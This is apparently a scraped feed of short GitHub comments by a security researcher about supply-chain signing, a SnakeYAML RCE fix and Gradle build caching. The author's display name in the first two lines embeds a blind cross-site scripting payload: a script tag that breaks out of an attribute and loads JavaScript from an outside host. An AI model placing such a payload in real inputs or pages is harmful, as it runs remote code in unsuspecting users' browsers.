Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
They (the GitHub security team) told me to report it here and open a PR. I don't have much free time. I started on one but got blocked by the...
@bryanmacfarlane Friendly ping. I haven't heard anything on the h1 issue.
I'd advocate for SHA-256 or SHA-512 signatures be passed if HTTP isn't supported over an explicit opt-out.
> That's up to the specific actions. Is it though? Doesn't the supply chain of one action cause a rippling effect down the supply chain? I could understand this decision...
@decebals friendly ping
@mhagnumdw you should be able to see it now
If you want the full story of how this vulnerability got resolved, here's the link: https://medium.com/bugbountywriteup/%EF%B8%8F-inside-the-160-comment-fight-to-fix-snakeyamls-rce-default-1a20c5ca4d4c
The concern I have with this solution is that the `init` script that the autobuilder uses won't be injected into the Gradle build with this solution. I don't know how...
The downside of using the `--no-build-cache` solution as you've done in this pull request is that it disables the build cache on all tasks, not just the compiler tasks. The...
Thanks! I'll give this a shot!